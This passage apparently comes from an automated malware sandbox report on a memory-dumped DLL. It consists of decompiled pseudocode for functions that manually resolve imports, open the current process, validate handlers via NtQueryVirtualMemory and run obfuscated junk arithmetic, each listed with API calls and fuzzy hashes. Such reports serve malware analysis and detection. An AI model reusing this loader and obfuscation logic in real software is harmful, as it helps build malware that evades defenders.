                  							E1000200D(_t44, _t32 + 4);
                  						}
                  					}
                  					_t25 = E10001E11(_v28);
                  				}
                  				ExitThread(_t25);
                  			}















                  0x10001360
                  0x10001371
                  0x1000137b
                  0x10001373
                  0x10001373
                  0x10001373
                  0x10001382
                  0x1000138b
                  0x10001390
                  0x100013a7
                  0x100013ae
                  0x10001405
                  0x100013b0
                  0x100013b6
                  0x100013bc
                  0x100013ca
                  0x100013d5
                  0x100013d7
                  0x100013e3
                  0x100013e5
                  0x100013f4
                  0x100013e7
                  0x100013ed
                  0x100013ed
                  0x100013e5
                  0x100013fc
                  0x100013fc
                  0x10001407

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.605461438.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.605430033.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.605499359.0000000010005000.00000040.00020000.sdmp Download File
                  Similarity
                  • API ID: ExitThreadlstrlen
                  • String ID:
                  • API String ID: 2636182767-0
                  • Opcode ID: bbc03089cd780e3a685a91eb4c0c862dad5948ab76aa5244e081fc2d8405439e
                  • Instruction ID: 2ce771c5e16d54c3ab671480280001d27b24c2f2c6965729a5a09e13ad1247cb
                  • Opcode Fuzzy Hash: bbc03089cd780e3a685a91eb4c0c862dad5948ab76aa5244e081fc2d8405439e
                  • Instruction Fuzzy Hash: D71149B1908245ABF711DBA4CC899CBB7ECEB483C0F02482AF555D7169EB30E6858B55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 37%
                  			E10001FE7(void* __eax, intOrPtr _a4) {
                  
                  				 *0x10004148 =  *0x10004148 & 0x00000000;
                  				_push(0);
                  				_push(0x10004144);
                  				_push(1);
                  				_push(_a4);
                  				 *0x10004140 = 0xc; // executed
                  				L10001BD6(); // executed
                  				return __eax;
                  			}



                  0x10001fe7
                  0x10001fee
                  0x10001ff0
                  0x10001ff5
                  0x10001ff7
                  0x10001ffb
                  0x10002005
                  0x1000200a

                  APIs
                  • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(10001387,00000001,10004144,00000000), ref: 10002005
                  Memory Dump Source
                  • Source File: 00000000.00000002.605461438.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.605430033.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.605499359.0000000010005000.00000040.00020000.sdmp Download File
                  Similarity
                  • API ID: DescriptorSecurity$ConvertString
                  • String ID:
                  • API String ID: 3907675253-0
                  • Opcode ID: 797134a9b1f988486b15df9cd10c437d68bca56e1d0ccba6a6193b38078adc0e
                  • Instruction ID: 77fc3a402b1b28792d7a6ab77bf10cd6ea7ed93b7dc72413e294461ac678640d
                  • Opcode Fuzzy Hash: 797134a9b1f988486b15df9cd10c437d68bca56e1d0ccba6a6193b38078adc0e
                  • Instruction Fuzzy Hash: 87C048F8140310ABF620DB019C86FC57AA2B7A4789F224508F200262E8DBB920988A2D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E10001DFC(void* _a4) {
                  				char _t2;
                  
                  				_t2 = RtlFreeHeap( *0x10004110, 0, _a4); // executed
                  				return _t2;
                  			}




                  0x10001e08
                  0x10001e0e

                  APIs
                  • RtlFreeHeap.NTDLL(00000000,?,100015AD,00000000,?,?,?,100016A9,?), ref: 10001E08
                  Memory Dump Source
                  • Source File: 00000000.00000002.605461438.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.605430033.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.605499359.0000000010005000.00000040.00020000.sdmp Download File
                  Similarity
                  • API ID: FreeHeap
                  • String ID:
                  • API String ID: 3298025750-0
                  • Opcode ID: 1fc4ddb0927f6eacf2c228d147bb437f356429c7c4a52989a9f03a222e5aa223
                  • Instruction ID: b2da5a76dde170a942c471694b92b9b742169823b4704214b2d097e37b55d36f
                  • Opcode Fuzzy Hash: 1fc4ddb0927f6eacf2c228d147bb437f356429c7c4a52989a9f03a222e5aa223
                  • Instruction Fuzzy Hash: 7CB01271440110EBFA128B00CD45F067F22B764740F01C410F300000B8C6318460FB18
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  C-Code - Quality: 100%
                  			E10001850() {
                  				void* _t1;
                  				long _t3;
                  				void* _t4;
                  				long _t5;
                  				void* _t6;
                  				intOrPtr _t8;
                  				void* _t12;
                  
                  				_t8 =  *0x10004130;
                  				_t1 = CreateEventA(0, 1, 0, 0);
                  				 *0x1000413c = _t1;
                  				if(_t1 == 0) {
                  					return GetLastError();
                  				}
                  				_t3 = GetVersion();
                  				if(_t3 != 5) {
                  					L4:
                  					if(_t12 <= 0) {
                  						_t4 = 0x32;
                  						return _t4;
                  					} else {
                  						goto L5;
                  					}
                  				} else {
                  					if(_t3 > 0) {
                  						L5:
                  						 *0x1000412c = _t3;
                  						_t5 = GetCurrentProcessId();
                  						 *0x10004128 = _t5;
                  						 *0x10004130 = _t8;
                  						_t6 = OpenProcess(0x10047a, 0, _t5);
                  						 *0x10004124 = _t6;
                  						if(_t6 == 0) {
                  							 *0x10004124 =  *0x10004124 | 0xffffffff;
                  						}
                  						return 0;
                  					} else {
                  						_t12 = _t3 - _t3;
                  						goto L4;
                  					}
                  				}
                  			}










                  0x10001851
                  0x1000185f
                  0x10001867
                  0x1000186c
                  0x100018be
                  0x100018be
                  0x1000186e
                  0x10001876
                  0x1000187e
                  0x1000187e
                  0x100018ba
                  0x100018bc
                  0x00000000
                  0x00000000
                  0x00000000
                  0x10001878
                  0x1000187a
                  0x10001880
                  0x10001880
                  0x10001885
                  0x10001893
                  0x10001898
                  0x1000189e
                  0x100018a6
                  0x100018ab
                  0x100018ad
                  0x100018ad
                  0x100018b7
                  0x1000187c
                  0x1000187c
                  0x00000000
                  0x1000187c
                  0x1000187a

                  APIs
                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,1000164B,74B063F0), ref: 1000185F
                  • GetVersion.KERNEL32 ref: 1000186E
                  • GetCurrentProcessId.KERNEL32 ref: 10001885
                  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 1000189E
                  Memory Dump Source
                  • Source File: 00000000.00000002.605461438.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.605430033.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.605499359.0000000010005000.00000040.00020000.sdmp Download File
                  Similarity
                  • API ID: Process$CreateCurrentEventOpenVersion
                  • String ID:
                  • API String ID: 845504543-0
                  • Opcode ID: ad5392e4f8523c6bff8dabd249a7cc4530ce31fe89c4eb97e7685ee26d633860
                  • Instruction ID: 85c0868463d14858f17c42858624fe0a32704ce5df48730f043fd2a385afc03a
                  • Opcode Fuzzy Hash: ad5392e4f8523c6bff8dabd249a7cc4530ce31fe89c4eb97e7685ee26d633860
                  • Instruction Fuzzy Hash: 69F0C2B06492309AF701DF68ADC57C53BE8E7097D2F028215E244D61ECDBB085818B5C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E10001745(void* __edi, intOrPtr _a4) {
                  				signed int _v8;
                  				intOrPtr* _v12;
                  				_Unknown_base(*)()** _v16;
                  				signed int _v20;
                  				signed short _v24;
                  				struct HINSTANCE__* _v28;
                  				intOrPtr _t43;
                  				intOrPtr* _t45;
                  				intOrPtr _t46;
                  				struct HINSTANCE__* _t47;
                  				intOrPtr* _t49;
                  				intOrPtr _t50;
                  				signed short _t51;
                  				_Unknown_base(*)()* _t53;
                  				CHAR* _t54;
                  				_Unknown_base(*)()* _t55;
                  				void* _t58;
                  				signed int _t59;
                  				_Unknown_base(*)()* _t60;
                  				intOrPtr _t61;
                  				intOrPtr _t65;
                  				signed int _t68;
                  				void* _t69;
                  				CHAR* _t71;
                  				signed short* _t73;
                  
                  				_t69 = __edi;
                  				_v20 = _v20 & 0x00000000;
                  				_t59 =  *0x1000414c;
                  				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
                  				if(_t43 != 0) {
                  					_t45 = _t43 + __edi;
                  					_v12 = _t45;
                  					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                  					if(_t46 != 0) {
                  						while(1) {
                  							_t71 = _t46 + _t69;
                  							_t47 = LoadLibraryA(_t71);
                  							_v28 = _t47;
                  							if(_t47 == 0) {
                  								break;
                  							}
                  							_v24 = _v24 & 0x00000000;
                  							 *_t71 = _t59 - 0x63699bc3;
                  							_t49 = _v12;
                  							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                  							_t50 =  *_t49;
                  							if(_t50 != 0) {
                  								L6:
                  								_t73 = _t50 + _t69;
                  								_v16 = _t61 + _t69;
                  								while(1) {
                  									_t51 =  *_t73;
                  									if(_t51 == 0) {
                  										break;
                  									}
                  									if(__eflags < 0) {
                  										__eflags = _t51 - _t69;
                  										if(_t51 < _t69) {
                  											L12:
                  											_t21 =  &_v8;
                  											 *_t21 = _v8 & 0x00000000;
                  											__eflags =  *_t21;
                  											_v24 =  *_t73 & 0x0000ffff;
                  										} else {
                  											_t65 = _a4;
                  											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                  											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                  												goto L12;
                  											} else {
                  												goto L11;
                  											}
                  										}
                  									} else {
                  										_t51 = _t51 + _t69;
                  										L11:
                  										_v8 = _t51;
                  									}
                  									_t53 = _v8;
                  									__eflags = _t53;
                  									if(_t53 == 0) {
                  										_t54 = _v24 & 0x0000ffff;
                  									} else {
                  										_t54 = _t53 + 2;
                  									}
                  									_t55 = GetProcAddress(_v28, _t54);
                  									__eflags = _t55;
                  									if(__eflags == 0) {
                  										_v20 = _t59 - 0x63699b44;
                  									} else {
                  										_t68 = _v8;
                  										__eflags = _t68;
                  										if(_t68 != 0) {
                  											 *_t68 = _t59 - 0x63699bc3;
                  										}
                  										 *_v16 = _t55;
                  										_t58 = 0x725990f8 + _t59 * 4;
                  										_t73 = _t73 + _t58;
                  										_t32 =  &_v16;
                  										 *_t32 = _v16 + _t58;
                  										__eflags =  *_t32;
                  										continue;
                  									}
                  									goto L23;
                  								}
                  							} else {
                  								_t50 = _t61;
                  								if(_t61 != 0) {
                  									goto L6;
                  								}
                  							}
                  							L23:
                  							_v12 = _v12 + 0x14;
                  							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                  							if(_t46 != 0) {
                  								continue;
                  							} else {
                  							}
                  							L26:
                  							goto L27;
                  						}
                  						_t60 = _t59 + 0x9c9664bb;
                  						__eflags = _t60;
                  						_v20 = _t60;
                  						goto L26;
                  					}
                  				}
                  				L27:
                  				return _v20;
                  			}




























                  0x10001745
                  0x1000174e
                  0x10001753
                  0x10001759
                  0x10001762
                  0x10001768
                  0x1000176a
                  0x1000176d
                  0x10001772
                  0x10001779
                  0x10001779
                  0x1000177d
                  0x10001785
                  0x10001788
                  0x00000000
                  0x00000000
                  0x1000178e
                  0x10001798
                  0x1000179a
                  0x1000179d
                  0x100017a0
                  0x100017a4
                  0x100017ac
                  0x100017ae
                  0x100017b1
                  0x10001819
                  0x10001819
                  0x1000181d
                  0x00000000
                  0x00000000
                  0x100017b6
                  0x100017bc
                  0x100017be
                  0x100017d1
                  0x100017d4
                  0x100017d4
                  0x100017d4
                  0x100017d8
                  0x100017c0
                  0x100017c0
                  0x100017c8
                  0x100017ca
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x100017ca
                  0x100017b8
                  0x100017b8
                  0x100017cc
                  0x100017cc
                  0x100017cc
                  0x100017db
                  0x100017de
                  0x100017e0
                  0x100017e7
                  0x100017e2
                  0x100017e2
                  0x100017e2
                  0x100017ef
                  0x100017f5
                  0x100017f7
                  0x10001827
                  0x100017f9
                  0x100017f9
                  0x100017fc
                  0x100017fe
                  0x10001806
                  0x10001806
                  0x1000180b
                  0x1000180d
                  0x10001814
                  0x10001816
                  0x10001816
                  0x10001816
                  0x00000000
                  0x10001816
                  0x00000000
                  0x100017f7
                  0x100017a6
                  0x100017a8
                  0x100017aa
                  0x00000000
                  0x00000000
                  0x100017aa
                  0x1000182a
                  0x1000182a
                  0x10001831
                  0x10001836
                  0x00000000
                  0x00000000
                  0x1000183c
                  0x10001847
                  0x00000000
                  0x10001847
                  0x1000183e
                  0x1000183e
                  0x10001844
                  0x00000000
                  0x10001844
                  0x10001772
                  0x10001848
                  0x1000184d

                  APIs
                  • LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 1000177D
                  • GetProcAddress.KERNEL32(?,00000000), ref: 100017EF
                  Memory Dump Source
                  • Source File: 00000000.00000002.605461438.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.605430033.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.605499359.0000000010005000.00000040.00020000.sdmp Download File
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID:
                  • API String ID: 2574300362-0
                  • Opcode ID: 44a8695f59bde02a6b04981e26f2814c296b5372f7ca6d95004bada70fc4ba09
                  • Instruction ID: c607def5a2bc0e5299d97bb95015c1db0b928527211c0f3006954d548cbcd348
                  • Opcode Fuzzy Hash: 44a8695f59bde02a6b04981e26f2814c296b5372f7ca6d95004bada70fc4ba09
                  • Instruction Fuzzy Hash: 78313675A0420A9FEB55CF99C880AEEB7F8FF04384F258069D805E7248EB70DA41CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E10002375(long _a4) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				signed int _v16;
                  				short* _v32;
                  				void _v36;
                  				void* _t57;
                  				signed int _t58;
                  				signed int _t61;
                  				signed int _t62;
                  				void* _t63;
                  				signed int* _t68;
                  				intOrPtr* _t69;
                  				intOrPtr* _t71;
                  				intOrPtr _t72;
                  				intOrPtr _t75;
                  				void* _t76;
                  				signed int _t77;
                  				void* _t78;
                  				void _t80;
                  				signed int _t81;
                  				signed int _t84;
                  				signed int _t86;
                  				short* _t87;
                  				void* _t89;
                  				signed int* _t90;
                  				long _t91;
                  				signed int _t93;
                  				signed int _t94;
                  				signed int _t100;
                  				signed int _t102;
                  				void* _t104;
                  				long _t108;
                  				signed int _t110;
                  
                  				_t108 = _a4;
                  				_t76 =  *(_t108 + 8);
                  				if((_t76 & 0x00000003) != 0) {
                  					L3:
                  					return 0;
                  				}
                  				_a4 =  *[fs:0x4];
                  				_v8 =  *[fs:0x8];
                  				if(_t76 < _v8 || _t76 >= _a4) {
                  					_t102 =  *(_t108 + 0xc);
                  					__eflags = _t102 - 0xffffffff;
                  					if(_t102 != 0xffffffff) {
                  						_t91 = 0;
                  						__eflags = 0;
                  						_a4 = 0;
                  						_t57 = _t76;
                  						do {
                  							_t80 =  *_t57;
                  							__eflags = _t80 - 0xffffffff;
                  							if(_t80 == 0xffffffff) {
                  								goto L9;
                  							}
                  							__eflags = _t80 - _t91;
                  							if(_t80 >= _t91) {
                  								L20:
                  								_t63 = 0;
                  								L60:
                  								return _t63;
                  							}
                  							L9:
                  							__eflags =  *(_t57 + 4);
                  							if( *(_t57 + 4) != 0) {
                  								_t12 =  &_a4;
                  								 *_t12 = _a4 + 1;
                  								__eflags =  *_t12;
                  							}
                  							_t91 = _t91 + 1;
                  							_t57 = _t57 + 0xc;
                  							__eflags = _t91 - _t102;
                  						} while (_t91 <= _t102);
                  						__eflags = _a4;
                  						if(_a4 == 0) {
                  							L15:
                  							_t81 =  *0x10004178;
                  							_t110 = _t76 & 0xfffff000;
                  							_t58 = 0;
                  							__eflags = _t81;
                  							if(_t81 <= 0) {
                  								L18:
                  								_t104 = _t102 | 0xffffffff;
                  								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                  								__eflags = _t61;
                  								if(_t61 < 0) {
                  									_t62 = 0;
                  									__eflags = 0;
                  								} else {
                  									_t62 = _a4;
                  								}
                  								__eflags = _t62;
                  								if(_t62 == 0) {
                  									L59:
                  									_t63 = _t104;
                  									goto L60;
                  								} else {
                  									__eflags = _v12 - 0x1000000;
                  									if(_v12 != 0x1000000) {
                  										goto L59;
                  									}
                  									__eflags = _v16 & 0x000000cc;
                  									if((_v16 & 0x000000cc) == 0) {
                  										L46:
                  										_t63 = 1;
                  										 *0x100041c0 = 1;
                  										__eflags =  *0x100041c0;
                  										if( *0x100041c0 != 0) {
                  											goto L60;
                  										}
                  										_t84 =  *0x10004178;
                  										__eflags = _t84;
                  										_t93 = _t84;
                  										if(_t84 <= 0) {
                  											L51:
                  											__eflags = _t93;
                  											if(_t93 != 0) {
                  												L58:
                  												 *0x100041c0 = 0;
                  												goto L5;
                  											}
                  											_t77 = 0xf;
                  											__eflags = _t84 - _t77;
                  											if(_t84 <= _t77) {
                  												_t77 = _t84;
                  											}
                  											_t94 = 0;
                  											__eflags = _t77;
                  											if(_t77 < 0) {
                  												L56:
                  												__eflags = _t84 - 0x10;
                  												if(_t84 < 0x10) {
                  													_t86 = _t84 + 1;
                  													__eflags = _t86;
                  													 *0x10004178 = _t86;
                  												}
                  												goto L58;
                  											} else {
                  												do {
                  													_t68 = 0x10004180 + _t94 * 4;
                  													_t94 = _t94 + 1;
                  													__eflags = _t94 - _t77;
                  													 *_t68 = _t110;
                  													_t110 =  *_t68;
                  												} while (_t94 <= _t77);
                  												goto L56;
                  											}
                  										}
                  										_t69 = 0x1000417c + _t84 * 4;
                  										while(1) {
                  											__eflags =  *_t69 - _t110;
                  											if( *_t69 == _t110) {
                  												goto L51;
                  											}
                  											_t93 = _t93 - 1;
                  											_t69 = _t69 - 4;
                  											__eflags = _t93;
                  											if(_t93 > 0) {
                  												continue;
                  											}
                  											goto L51;
                  										}
                  										goto L51;
                  									}
                  									_t87 = _v32;
                  									__eflags =  *_t87 - 0x5a4d;
                  									if( *_t87 != 0x5a4d) {
                  										goto L59;
                  									}
                  									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                  									__eflags =  *_t71 - 0x4550;
                  									if( *_t71 != 0x4550) {
                  										goto L59;
                  									}
                  									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                  									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                  										goto L59;
                  									}
                  									_t78 = _t76 - _t87;
                  									__eflags =  *((short*)(_t71 + 6));
                  									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                  									if( *((short*)(_t71 + 6)) <= 0) {
                  										goto L59;
                  									}
                  									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                  									__eflags = _t78 - _t72;
                  									if(_t78 < _t72) {
                  										goto L46;
                  									}
                  									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                  									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                  										goto L46;
                  									}
                  									__eflags =  *(_t89 + 0x27) & 0x00000080;
                  									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                  										goto L20;
                  									}
                  									goto L46;
                  								}
                  							} else {
                  								goto L16;
                  							}
                  							while(1) {
                  								L16:
                  								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
                  								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
                  									break;
                  								}
                  								_t58 = _t58 + 1;
                  								__eflags = _t58 - _t81;
                  								if(_t58 < _t81) {
                  									continue;
                  								}
                  								goto L18;
                  							}
                  							__eflags = _t58;
                  							if(_t58 <= 0) {
                  								goto L5;
                  							}
                  							 *0x100041c0 = 1;
                  							__eflags =  *0x100041c0;
                  							if( *0x100041c0 != 0) {
                  								goto L5;
                  							}
                  							__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
                  							if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
                  								L32:
                  								_t100 = 0;
                  								__eflags = _t58;
                  								if(_t58 < 0) {
                  									L34:
                  									 *0x100041c0 = 0;
                  									goto L5;
                  								} else {
                  									goto L33;
                  								}
                  								do {
                  									L33:
                  									_t90 = 0x10004180 + _t100 * 4;
                  									_t100 = _t100 + 1;
                  									__eflags = _t100 - _t58;
                  									 *_t90 = _t110;
                  									_t110 =  *_t90;
                  								} while (_t100 <= _t58);
                  								goto L34;
                  							}
                  							_t58 = _t81 - 1;
                  							__eflags = _t58;
                  							if(_t58 < 0) {
                  								L28:
                  								__eflags = _t81 - 0x10;
                  								if(_t81 < 0x10) {
                  									_t81 = _t81 + 1;
                  									__eflags = _t81;
                  									 *0x10004178 = _t81;
                  								}
                  								_t58 = _t81 - 1;
                  								goto L32;
                  							} else {
                  								goto L25;
                  							}
                  							while(1) {
                  								L25:
                  								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
                  								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
                  									break;
                  								}
                  								_t58 = _t58 - 1;
                  								__eflags = _t58;
                  								if(_t58 >= 0) {
                  									continue;
                  								}
                  								break;
                  							}
                  							__eflags = _t58;
                  							if(__eflags >= 0) {
                  								if(__eflags == 0) {
                  									goto L34;
                  								}
                  								goto L32;
                  							}
                  							goto L28;
                  						}
                  						_t75 =  *((intOrPtr*)(_t108 - 8));
                  						__eflags = _t75 - _v8;
                  						if(_t75 < _v8) {
                  							goto L20;
                  						}
                  						__eflags = _t75 - _t108;
                  						if(_t75 >= _t108) {
                  							goto L20;
                  						}
                  						goto L15;
                  					}
                  					L5:
                  					_t63 = 1;
                  					goto L60;
                  				} else {
                  					goto L3;
                  				}
                  			}




































                  0x1000237f
                  0x10002382
                  0x10002388
                  0x100023a6
                  0x00000000
                  0x100023a6
                  0x10002390
                  0x10002399
                  0x1000239f
                  0x100023ae
                  0x100023b1
                  0x100023b4
                  0x100023be
                  0x100023be
                  0x100023c0
                  0x100023c3
                  0x100023c5
                  0x100023c5
                  0x100023c7
                  0x100023ca
                  0x00000000
                  0x00000000
                  0x100023cc
                  0x100023ce
                  0x10002434
                  0x10002434
                  0x10002592
                  0x00000000
                  0x10002592
                  0x100023d0
                  0x100023d0
                  0x100023d4
                  0x100023d6
                  0x100023d6
                  0x100023d6
                  0x100023d6
                  0x100023d9
                  0x100023da
                  0x100023dd
                  0x100023dd
                  0x100023e1
                  0x100023e5
                  0x100023f3
                  0x100023f3
                  0x100023fb
                  0x10002401
                  0x10002403
                  0x10002405
                  0x10002415
                  0x10002422
                  0x10002426
                  0x1000242b
                  0x1000242d
                  0x100024ab
                  0x100024ab
                  0x1000242f
                  0x1000242f
                  0x1000242f
                  0x100024ad
                  0x100024af
                  0x10002590
                  0x10002590
                  0x00000000
                  0x100024b5
                  0x100024b5
                  0x100024bc
                  0x00000000
                  0x00000000
                  0x100024c2
                  0x100024c6
                  0x10002522
                  0x10002524
                  0x1000252c
                  0x1000252e
                  0x10002530
                  0x00000000
                  0x00000000
                  0x10002532
                  0x10002538
                  0x1000253a
                  0x1000253c
                  0x10002551
                  0x10002551
                  0x10002553
                  0x10002582
                  0x10002589
                  0x00000000
                  0x10002589
                  0x10002557
                  0x10002558
                  0x1000255a
                  0x1000255c
                  0x1000255c
                  0x1000255e
                  0x10002560
                  0x10002562
                  0x10002576
                  0x10002576
                  0x10002579
                  0x1000257b
                  0x1000257b
                  0x1000257c
                  0x1000257c
                  0x00000000
                  0x10002564
                  0x10002564
                  0x10002564
                  0x1000256d
                  0x1000256e
                  0x10002570
                  0x10002572
                  0x10002572
                  0x00000000
                  0x10002564
                  0x10002562
                  0x1000253e
                  0x10002545
                  0x10002545
                  0x10002547
                  0x00000000
                  0x00000000
                  0x10002549
                  0x1000254a
                  0x1000254d
                  0x1000254f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x1000254f
                  0x00000000
                  0x10002545
                  0x100024c8
                  0x100024cb
                  0x100024d0
                  0x00000000
                  0x00000000
                  0x100024d9
                  0x100024db
                  0x100024e1
                  0x00000000
                  0x00000000
                  0x100024e7
                  0x100024ed
                  0x00000000
                  0x00000000
                  0x100024f3
                  0x100024f5
                  0x100024fe
                  0x10002502
                  0x00000000
                  0x00000000
                  0x10002508
                  0x1000250b
                  0x1000250d
                  0x00000000
                  0x00000000
                  0x10002514
                  0x10002516
                  0x00000000
                  0x00000000
                  0x10002518
                  0x1000251c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x1000251c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x10002407
                  0x10002407
                  0x10002407
                  0x1000240e
                  0x00000000
                  0x00000000
                  0x10002410
                  0x10002411
                  0x10002413
                  0x00000000
                  0x00000000
                  0x00000000
                  0x10002413
                  0x1000243b
                  0x1000243d
                  0x00000000
                  0x00000000
                  0x1000244d
                  0x1000244f
                  0x10002451
                  0x00000000
                  0x00000000
                  0x10002457
                  0x1000245e
                  0x1000248a
                  0x1000248a
                  0x1000248c
                  0x1000248e
                  0x100024a2
                  0x100024a4
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x10002490
                  0x10002490
                  0x10002490
                  0x10002499
                  0x1000249a
                  0x1000249c
                  0x1000249e
                  0x1000249e
                  0x00000000
                  0x10002490
                  0x10002460
                  0x10002463
                  0x10002465
                  0x10002477
                  0x10002477
                  0x1000247a
                  0x1000247c
                  0x1000247c
                  0x1000247d
                  0x1000247d
                  0x10002483
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x10002467
                  0x10002467
                  0x10002467
                  0x1000246e
                  0x00000000
                  0x00000000
                  0x10002470
                  0x10002470
                  0x10002471
                  0x00000000
                  0x00000000
                  0x00000000
                  0x10002471
                  0x10002473
                  0x10002475
                  0x10002488
                  0x00000000
                  0x00000000
                  0x00000000
                  0x10002488
                  0x00000000
                  0x10002475
                  0x100023e7
                  0x100023ea
                  0x100023ed
                  0x00000000
                  0x00000000
                  0x100023ef
                  0x100023f1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x100023f1
                  0x100023b6
                  0x100023b8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 10002426
                  Memory Dump Source
                  • Source File: 00000000.00000002.605461438.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.605430033.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.605499359.0000000010005000.00000040.00020000.sdmp Download File
                  Similarity
                  • API ID: MemoryQueryVirtual
                  • String ID:
                  • API String ID: 2850889275-0
                  • Opcode ID: bc62919f775303453252f92297d23a638608a8d642d2c7d4ab03d1755088ac9f
                  • Instruction ID: 0c254990f4eddd9df484f3b683da5194678d0c4feb8b8adbfe3d5bca3f7d4cb2
                  • Opcode Fuzzy Hash: bc62919f775303453252f92297d23a638608a8d642d2c7d4ab03d1755088ac9f
                  • Instruction Fuzzy Hash: 3861E170A00A52DFFB19CF28CCE065937E5EB893D5F628439D856C729DEB30DD828A54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E03051B1E(void* __eax, void* __ebx, void* __eflags, signed int _a4, signed int _a8) {
                  				signed int _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				signed int _t58;
                  				signed int _t60;
                  				void* _t77;
                  				void* _t89;
                  				void* _t90;
                  				signed int _t91;
                  				void* _t95;
                  				signed int _t96;
                  				signed int _t97;
                  				signed int _t101;
                  				signed int _t105;
                  				signed int _t106;
                  
                  				_t89 = __ebx;
                  				_t58 = E03052467(__eax, __ebx,  *((intOrPtr*)(__ebx + 0x41c395)),  *((intOrPtr*)(__ebx + 0x41c290)),  *((intOrPtr*)(__ebx + 0x41c3b1)));
                  				if(_t58 < 0xda63) {
                  					_t58 = (_t58 & 0x00000000) - 0xffffffff;
                  				} else {
                  					_a8 = _a8 & 0xffffffff;
                  					_t105 = _t105 ^  *(__ebx + 0x41c8a6);
                  				}
                  				_t106 = _t105 | _t101;
                  				 *(_t89 + 0x41c8a6) =  *(_t89 + 0x41c8a6) - 1;
                  				_v12 = _v12 - 1;
                  				_t60 = _t58 & 0x00000000;
                  				_t96 = _t95 - _t60;
                  				if(_a4 < 0x7e4d) {
                  					_v16 = 0x581;
                  					 *(_t89 + 0x41c8a6) = 0xffffffff;
                  					_t97 = 1;
                  				} else {
                  					_t97 = _t96 ^ 0x00000034;
                  					_a4 = _a4 ^ 0xffffffff;
                  				}
                  				_t91 = _t90 - 0xffffffff;
                  				if(_t60 - 1 >= 0x60f9) {
                  					 *(_t89 + 0x41c8a6) = 1;
                  					_v16 = _v16 + 0xfffffe47;
                  				} else {
                  					_t106 =  *(_t89 + 0x41c8a6);
                  				}
                  				 *(_t89 + 0x41c8a6) =  *(_t89 + 0x41c8a6) + _t101;
                  				_v8 = _v8 | _t101;
                  				_v8 = _v8 - 1;
                  				_v12 = _v12 ^ 0x00000000;
                  				 *(_t89 + 0x41c8a6) = 0xfffff898;
                  				 *(_t89 + 0x41c8a6) =  *(_t89 + 0x41c8a6) - 1;
                  				_v16 = 1;
                  				_a4 = (_t106 + 0x00000001 - 0x00000001 & 0x00000000) + 1;
                  				 *(_t89 + 0x41c8a6) =  *(_t89 + 0x41c8a6) + (_t91 ^ _t97 & 0x00000000) + 1 + _v12;
                  				 *(_t89 + 0x41c8a6) =  *(_t89 + 0x41c8a6) + 1;
                  				_v8 = 1;
                  				_t77 = E03059159(_v16, _t89, (_t106 + 0x00000001 - 0x00000001 & 0x00000000) + 1);
